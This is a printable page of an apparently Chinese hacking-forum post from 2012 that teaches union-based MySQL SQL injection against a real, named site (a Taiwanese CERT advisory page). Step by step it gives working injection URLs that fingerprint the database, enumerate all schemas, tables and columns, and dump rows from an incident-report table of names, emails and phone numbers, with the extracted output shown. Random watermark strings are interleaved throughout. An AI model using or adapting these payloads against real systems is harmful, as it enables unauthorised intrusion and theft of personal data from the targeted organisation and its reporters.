中国网络渗透测试联盟
标题:
.高级暴库方法讲解
[打印本页]
作者:
admin
时间:
2012-9-13 17:57
标题:
.高级暴库方法讲解
1.判断版本
http://www.cert.org.tw/document/advisory/detail.php?id=7
and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
- U( L( `! t- [" ^
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
: R/ z4 P8 z) e* H7 v
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,2,3,4,5,6,7,8,9--
; E/ b7 ~& Y9 C) H% W
3.查看数据库版本及当前用户,
http://www.cert.org.tw/document/advisory/detail.php?id=7
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
- k; ], w9 b9 H+ _# K8 z4 P2 D
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
3 N8 _ p6 j6 _! n( k
4.判断有没有写权限
) p* }! [0 N6 m) w
http://www.cert.org.tw/document/advisory/detail.php?id=7
and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
) w0 h J' B; r% k1 e
没办法,手动猜表啦
" t! |1 y. g1 R8 L! y8 `
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
( ]2 V- D, y/ p3 \4 O8 `+ O4 X0 m
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
& D; b! r0 Z' E; U
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
3 G& y2 \; l3 _, d8 ~# P+ v6 U& E7 n
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
1 |- a1 b+ q4 v% t% D6 j/ c5 q; D: O( c
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
8 g2 M q) x& V# N
6.爆表,爆的是twcert库
, K) u" W8 s' I. Y0 [5 ~! ?
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
: I1 |4 ^ Y; @( g7 O1 J
爆出如下表
+ e2 M# e- s9 \% M, J
downloadfile,irsys,newsdata,secrpt,secrpt_big5
" w) F. ~/ o5 M/ H3 |+ W* e; j
7.爆列名,这次爆的是irsys表
0 ]* X/ m; w- e0 G# g/ e
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. T% J4 D6 b8 U r- Q K- ?
爆出如下列
: p7 x( e7 ~0 s2 s4 q/ ^
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 h6 i r' p5 _, N, O l0 u1 }# ^0 _
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
# r. q1 D) X, Z, h3 A
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
! U6 z" S! q( |/ k
返回是3,说明每个列里有3个地段
. o) Y- f4 G7 L3 W
9.爆字段内容
9 m) q( p, G# f+ Y
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
1 K+ ]; N7 v' C
爆出name列的第一个字段的内容
6 V( T$ ~$ g' V/ K+ w t
http://www.cert.org.tw/document/ ... union+select+concat
(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
0 V4 t7 a' w1 ^: _
爆出name列的第二个字段的内容
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2